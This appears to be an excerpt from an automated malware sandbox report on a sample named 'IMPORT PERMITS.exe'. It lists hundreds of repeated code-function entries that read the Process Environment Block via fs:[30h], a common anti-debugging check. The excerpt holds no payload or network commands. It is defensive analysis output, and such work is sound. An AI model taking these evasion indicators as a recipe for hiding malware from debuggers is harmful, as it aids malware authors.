                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014605A7 mov eax, dword ptr fs:[00000030h]2_2_014605A7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E65D0 mov eax, dword ptr fs:[00000030h]2_2_013E65D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014045B1 mov eax, dword ptr fs:[00000030h]2_2_014045B1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014045B1 mov eax, dword ptr fs:[00000030h]2_2_014045B1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140245A mov eax, dword ptr fs:[00000030h]2_2_0140245A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DC427 mov eax, dword ptr fs:[00000030h]2_2_013DC427
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE420 mov eax, dword ptr fs:[00000030h]2_2_013DE420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE420 mov eax, dword ptr fs:[00000030h]2_2_013DE420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE420 mov eax, dword ptr fs:[00000030h]2_2_013DE420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149A456 mov eax, dword ptr fs:[00000030h]2_2_0149A456
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146C460 mov ecx, dword ptr fs:[00000030h]2_2_0146C460
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140A470 mov eax, dword ptr fs:[00000030h]2_2_0140A470
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140A470 mov eax, dword ptr fs:[00000030h]2_2_0140A470
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140A470 mov eax, dword ptr fs:[00000030h]2_2_0140A470
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01418402 mov eax, dword ptr fs:[00000030h]2_2_01418402
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01418402 mov eax, dword ptr fs:[00000030h]2_2_01418402
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01418402 mov eax, dword ptr fs:[00000030h]2_2_01418402
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D645D mov eax, dword ptr fs:[00000030h]2_2_013D645D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E64AB mov eax, dword ptr fs:[00000030h]2_2_013E64AB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149A49A mov eax, dword ptr fs:[00000030h]2_2_0149A49A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E04E5 mov ecx, dword ptr fs:[00000030h]2_2_013E04E5
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014144B0 mov ecx, dword ptr fs:[00000030h]2_2_014144B0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146A4B0 mov eax, dword ptr fs:[00000030h]2_2_0146A4B0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141674D mov esi, dword ptr fs:[00000030h]2_2_0141674D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141674D mov eax, dword ptr fs:[00000030h]2_2_0141674D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141674D mov eax, dword ptr fs:[00000030h]2_2_0141674D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422750 mov eax, dword ptr fs:[00000030h]2_2_01422750
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422750 mov eax, dword ptr fs:[00000030h]2_2_01422750
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01464755 mov eax, dword ptr fs:[00000030h]2_2_01464755
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146E75D mov eax, dword ptr fs:[00000030h]2_2_0146E75D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E0710 mov eax, dword ptr fs:[00000030h]2_2_013E0710
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C700 mov eax, dword ptr fs:[00000030h]2_2_0141C700
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8770 mov eax, dword ptr fs:[00000030h]2_2_013E8770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01410710 mov eax, dword ptr fs:[00000030h]2_2_01410710
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C720 mov eax, dword ptr fs:[00000030h]2_2_0141C720
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C720 mov eax, dword ptr fs:[00000030h]2_2_0141C720
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E0750 mov eax, dword ptr fs:[00000030h]2_2_013E0750
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145C730 mov eax, dword ptr fs:[00000030h]2_2_0145C730
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141273C mov eax, dword ptr fs:[00000030h]2_2_0141273C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141273C mov ecx, dword ptr fs:[00000030h]2_2_0141273C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141273C mov eax, dword ptr fs:[00000030h]2_2_0141273C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014607C3 mov eax, dword ptr fs:[00000030h]2_2_014607C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E07AF mov eax, dword ptr fs:[00000030h]2_2_013E07AF
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146E7E1 mov eax, dword ptr fs:[00000030h]2_2_0146E7E1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014027ED mov eax, dword ptr fs:[00000030h]2_2_014027ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014027ED mov eax, dword ptr fs:[00000030h]2_2_014027ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014027ED mov eax, dword ptr fs:[00000030h]2_2_014027ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E47FB mov eax, dword ptr fs:[00000030h]2_2_013E47FB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E47FB mov eax, dword ptr fs:[00000030h]2_2_013E47FB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148678E mov eax, dword ptr fs:[00000030h]2_2_0148678E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014947A0 mov eax, dword ptr fs:[00000030h]2_2_014947A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EC7C0 mov eax, dword ptr fs:[00000030h]2_2_013EC7C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E262C mov eax, dword ptr fs:[00000030h]2_2_013E262C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE627 mov eax, dword ptr fs:[00000030h]2_2_013FE627
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A660 mov eax, dword ptr fs:[00000030h]2_2_0141A660
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A660 mov eax, dword ptr fs:[00000030h]2_2_0141A660
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A866E mov eax, dword ptr fs:[00000030h]2_2_014A866E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A866E mov eax, dword ptr fs:[00000030h]2_2_014A866E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F260B mov eax, dword ptr fs:[00000030h]2_2_013F260B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F260B mov eax, dword ptr fs:[00000030h]2_2_013F260B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F260B mov eax, dword ptr fs:[00000030h]2_2_013F260B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F260B mov eax, dword ptr fs:[00000030h]2_2_013F260B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F260B mov eax, dword ptr fs:[00000030h]2_2_013F260B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F260B mov eax, dword ptr fs:[00000030h]2_2_013F260B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F260B mov eax, dword ptr fs:[00000030h]2_2_013F260B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01412674 mov eax, dword ptr fs:[00000030h]2_2_01412674
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E609 mov eax, dword ptr fs:[00000030h]2_2_0145E609
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422619 mov eax, dword ptr fs:[00000030h]2_2_01422619
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01416620 mov eax, dword ptr fs:[00000030h]2_2_01416620
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01418620 mov eax, dword ptr fs:[00000030h]2_2_01418620
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FC640 mov eax, dword ptr fs:[00000030h]2_2_013FC640
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0141A6C7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A6C7 mov eax, dword ptr fs:[00000030h]2_2_0141A6C7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E4690 mov eax, dword ptr fs:[00000030h]2_2_013E4690
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E4690 mov eax, dword ptr fs:[00000030h]2_2_013E4690
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E6F2 mov eax, dword ptr fs:[00000030h]2_2_0145E6F2
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E6F2 mov eax, dword ptr fs:[00000030h]2_2_0145E6F2
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E6F2 mov eax, dword ptr fs:[00000030h]2_2_0145E6F2
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E6F2 mov eax, dword ptr fs:[00000030h]2_2_0145E6F2
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014606F1 mov eax, dword ptr fs:[00000030h]2_2_014606F1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014606F1 mov eax, dword ptr fs:[00000030h]2_2_014606F1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C6A6 mov eax, dword ptr fs:[00000030h]2_2_0141C6A6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014166B0 mov eax, dword ptr fs:[00000030h]2_2_014166B0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01460946 mov eax, dword ptr fs:[00000030h]2_2_01460946
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4940 mov eax, dword ptr fs:[00000030h]2_2_014B4940
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01406962 mov eax, dword ptr fs:[00000030h]2_2_01406962
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01406962 mov eax, dword ptr fs:[00000030h]2_2_01406962
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01406962 mov eax, dword ptr fs:[00000030h]2_2_01406962
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D8918 mov eax, dword ptr fs:[00000030h]2_2_013D8918
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D8918 mov eax, dword ptr fs:[00000030h]2_2_013D8918
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0142096E mov eax, dword ptr fs:[00000030h]2_2_0142096E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0142096E mov edx, dword ptr fs:[00000030h]2_2_0142096E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0142096E mov eax, dword ptr fs:[00000030h]2_2_0142096E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01484978 mov eax, dword ptr fs:[00000030h]2_2_01484978
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01484978 mov eax, dword ptr fs:[00000030h]2_2_01484978
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146C97C mov eax, dword ptr fs:[00000030h]2_2_0146C97C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E908 mov eax, dword ptr fs:[00000030h]2_2_0145E908
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E908 mov eax, dword ptr fs:[00000030h]2_2_0145E908
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146C912 mov eax, dword ptr fs:[00000030h]2_2_0146C912
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146892A mov eax, dword ptr fs:[00000030h]2_2_0146892A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0147892B mov eax, dword ptr fs:[00000030h]2_2_0147892B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014769C0 mov eax, dword ptr fs:[00000030h]2_2_014769C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014149D0 mov eax, dword ptr fs:[00000030h]2_2_014149D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E09AD mov eax, dword ptr fs:[00000030h]2_2_013E09AD
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E09AD mov eax, dword ptr fs:[00000030h]2_2_013E09AD
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AA9D3 mov eax, dword ptr fs:[00000030h]2_2_014AA9D3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A0 mov eax, dword ptr fs:[00000030h]2_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146E9E0 mov eax, dword ptr fs:[00000030h]2_2_0146E9E0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014129F9 mov eax, dword ptr fs:[00000030h]2_2_014129F9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014129F9 mov eax, dword ptr fs:[00000030h]2_2_014129F9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA9D0 mov eax, dword ptr fs:[00000030h]2_2_013EA9D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA9D0 mov eax, dword ptr fs:[00000030h]2_2_013EA9D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA9D0 mov eax, dword ptr fs:[00000030h]2_2_013EA9D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA9D0 mov eax, dword ptr fs:[00000030h]2_2_013EA9D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA9D0 mov eax, dword ptr fs:[00000030h]2_2_013EA9D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA9D0 mov eax, dword ptr fs:[00000030h]2_2_013EA9D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014689B3 mov esi, dword ptr fs:[00000030h]2_2_014689B3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014689B3 mov eax, dword ptr fs:[00000030h]2_2_014689B3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014689B3 mov eax, dword ptr fs:[00000030h]2_2_014689B3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01410854 mov eax, dword ptr fs:[00000030h]2_2_01410854
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146E872 mov eax, dword ptr fs:[00000030h]2_2_0146E872
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146E872 mov eax, dword ptr fs:[00000030h]2_2_0146E872
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01476870 mov eax, dword ptr fs:[00000030h]2_2_01476870
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01476870 mov eax, dword ptr fs:[00000030h]2_2_01476870
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146C810 mov eax, dword ptr fs:[00000030h]2_2_0146C810
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E4859 mov eax, dword ptr fs:[00000030h]2_2_013E4859
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E4859 mov eax, dword ptr fs:[00000030h]2_2_013E4859
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A830 mov eax, dword ptr fs:[00000030h]2_2_0141A830
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148483A mov eax, dword ptr fs:[00000030h]2_2_0148483A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148483A mov eax, dword ptr fs:[00000030h]2_2_0148483A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01402835 mov eax, dword ptr fs:[00000030h]2_2_01402835
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01402835 mov eax, dword ptr fs:[00000030h]2_2_01402835
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01402835 mov eax, dword ptr fs:[00000030h]2_2_01402835
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01402835 mov ecx, dword ptr fs:[00000030h]2_2_01402835
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01402835 mov eax, dword ptr fs:[00000030h]2_2_01402835
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01402835 mov eax, dword ptr fs:[00000030h]2_2_01402835
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F2840 mov ecx, dword ptr fs:[00000030h]2_2_013F2840
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E8C0 mov eax, dword ptr fs:[00000030h]2_2_0140E8C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B08C0 mov eax, dword ptr fs:[00000030h]2_2_014B08C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AA8E4 mov eax, dword ptr fs:[00000030h]2_2_014AA8E4
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C8F9 mov eax, dword ptr fs:[00000030h]2_2_0141C8F9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C8F9 mov eax, dword ptr fs:[00000030h]2_2_0141C8F9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E0887 mov eax, dword ptr fs:[00000030h]2_2_013E0887
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146C89D mov eax, dword ptr fs:[00000030h]2_2_0146C89D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01494B4B mov eax, dword ptr fs:[00000030h]2_2_01494B4B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01494B4B mov eax, dword ptr fs:[00000030h]2_2_01494B4B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01476B40 mov eax, dword ptr fs:[00000030h]2_2_01476B40
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01476B40 mov eax, dword ptr fs:[00000030h]2_2_01476B40
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AAB40 mov eax, dword ptr fs:[00000030h]2_2_014AAB40
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01488B42 mov eax, dword ptr fs:[00000030h]2_2_01488B42
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148EB50 mov eax, dword ptr fs:[00000030h]2_2_0148EB50
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B2B57 mov eax, dword ptr fs:[00000030h]2_2_014B2B57
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B2B57 mov eax, dword ptr fs:[00000030h]2_2_014B2B57
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B2B57 mov eax, dword ptr fs:[00000030h]2_2_014B2B57
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B2B57 mov eax, dword ptr fs:[00000030h]2_2_014B2B57
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DCB7E mov eax, dword ptr fs:[00000030h]2_2_013DCB7E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4B00 mov eax, dword ptr fs:[00000030h]2_2_014B4B00
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145EB1D mov eax, dword ptr fs:[00000030h]2_2_0145EB1D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145EB1D mov eax, dword ptr fs:[00000030h]2_2_0145EB1D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145EB1D mov eax, dword ptr fs:[00000030h]2_2_0145EB1D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145EB1D mov eax, dword ptr fs:[00000030h]2_2_0145EB1D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145EB1D mov eax, dword ptr fs:[00000030h]2_2_0145EB1D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145EB1D mov eax, dword ptr fs:[00000030h]2_2_0145EB1D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145EB1D mov eax, dword ptr fs:[00000030h]2_2_0145EB1D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145EB1D mov eax, dword ptr fs:[00000030h]2_2_0145EB1D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145EB1D mov eax, dword ptr fs:[00000030h]2_2_0145EB1D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140EB20 mov eax, dword ptr fs:[00000030h]2_2_0140EB20
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140EB20 mov eax, dword ptr fs:[00000030h]2_2_0140EB20
